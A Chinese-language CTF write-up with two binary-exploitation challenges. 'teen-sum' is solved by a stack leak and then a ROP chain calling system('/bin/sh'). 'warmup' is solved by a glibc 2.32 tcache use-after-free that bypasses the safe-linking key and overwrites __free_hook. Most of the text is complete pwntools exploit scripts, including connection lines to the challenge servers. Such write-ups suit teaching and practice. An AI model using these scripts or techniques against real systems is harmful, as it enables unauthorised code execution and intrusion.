还有一道musl uaf一道kernel rop

之后补上(如果记得的话

teen-sum

1
2
3
4
5
6
7
8
9
$checksec teen-sum
[*] '/home/wendy/Desktop/BSides-Noida-CTF-master/Pwn/teen-sum/teen-sum'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
    RUNPATH:  '.'

两次机会输入name,一次泄露栈内容得到libc

一次栈溢出,注意要把name_sz覆盖为数字,同时glibc2.23以上版本的栈溢出需要加ret调栈

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# -*- coding: UTF-8 -*-
from pwn import *
import sys
context.log_level='debug'
context.arch='amd64'
binary='./teen-sum'
elf=ELF(binary)
libc = ELF('/home/wendy/Desktop/glibc-all-in-one/libs/2.31-0ubuntu9.2_amd64/libc.so.6')
flag=0
if flag:
    sh = remote('39.96.88.40', 7020)
else:
    sh = process(binary)
sa = lambda s,n : sh.sendafter(s,n)
sla = lambda s,n : sh.sendlineafter(s,n)
sl = lambda s : sh.sendline(s)
sd = lambda s : sh.send(s)
rc = lambda n : sh.recv(n)
ru = lambda s : sh.recvuntil(s)
ti = lambda : sh.interactive()
leak = lambda name,addr :log.success(name+':'+hex(addr))

# 0x227e0a
# 0x48

sla('> ',str(0x10))
sla('> ','')
libc_base = u64(ru('\x7f')[-6:].ljust(8,'\x00')) - 0x223e0a
leak('libc_base',libc_base)
binsh=libc_base+next(libc.search(b'/bin/sh'))
pop_rdi = libc_base+0x0000000000026b72
system = libc_base+libc.sym['system']
ret = libc_base+0x0000000000025679

sla('> ','1')
sla('> ','1')
sla('> ','1')
pause()
sla('New size please.> ',str(0x100))
pause()
sla('> ','a'*0x38+p64(0)+'a'*8+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system))
# gdb.attach(sh)
ti()

warmup

malloc没有清空chunk,可以泄露libc,这里写入的时候会再size-1处置0,puts输出会被截断,但是size为0就不影响泄露了

然后有一次uaf机会,打tcache,注意2.32版本多了一个key检查

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
# -*- coding: UTF-8 -*-
from pwn import *
import sys
context.log_level='debug'
context.arch='amd64'

binary = './warmup'
elf=ELF(binary)
libc = ELF('/home/wendy/Desktop/glibc-all-in-one/libs/2.32-0ubuntu3_amd64/libc.so.6')
flag=0
if flag:
    sh = remote('47.104.70.90', 25315)
else:
    sh = process(binary)

sa = lambda s,n : sh.sendafter(s,n)
sla = lambda s,n : sh.sendlineafter(s,n)
sl = lambda s : sh.sendline(s)
sd = lambda s : sh.send(s)
rc = lambda n : sh.recv(n)
ru = lambda s : sh.recvuntil(s)
ti = lambda : sh.interactive()
leak = lambda name,addr :log.success(name+":"+hex(addr))
def leaklibc():
    global libc_base,__malloc_hook,__free_hook,system,binsh_addr,_IO_2_1_stdout_,_IO_list_all,realloc
    libc_base = u64(sh.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 0x1e4030
    success('libc_base = '+hex(libc_base))
    __malloc_hook=libc_base+libc.sym['__malloc_hook']
    __free_hook=libc_base+libc.sym['__free_hook']
    system=libc_base+libc.sym['system']
    realloc=libc_base+libc.sym['realloc']
def cmd(index):
   sla('> ', str(index))
def add(index,sz,data):
    cmd(1)
    sla('idx: ',str(index)) #0-15
    sla('sz: ',str(sz)) #<=0x1000
    sa('data: ',data)
def edit(index,data):
    cmd(3)
    sla('idx: ',str(index))
    sa('data: ',data)
def show(index):
    cmd(2)
    sla('idx: ',str(index))
def dele(index):
    cmd(4)
    sla('idx: ',str(index))
def save(index):
    cmd(5)
    sla('idx: ',str(index))


add(0,0x10,'a')
add(1,0x500,'b')
add(2,0x20,'a')
add(3,0x20,'a')
add(4,0x20,'a')

dele(0)
dele(1)

add(0,0,'')
show(0)
ru('data: ')
key = u64(rc(5).ljust(8,'\x00'))
leak('key',key)

add(1,0,'')
show(1)
leaklibc()

dele(3)
save(4)
dele(4)

edit(4,p64(__free_hook^key) + p64((key<<12) + 0x10) + '\n')
add(5,0x20,'/bin/sh\x00\n')
add(6,0x20,p64(system)+'\n')
dele(5)
# gdb.attach(sh)
ti()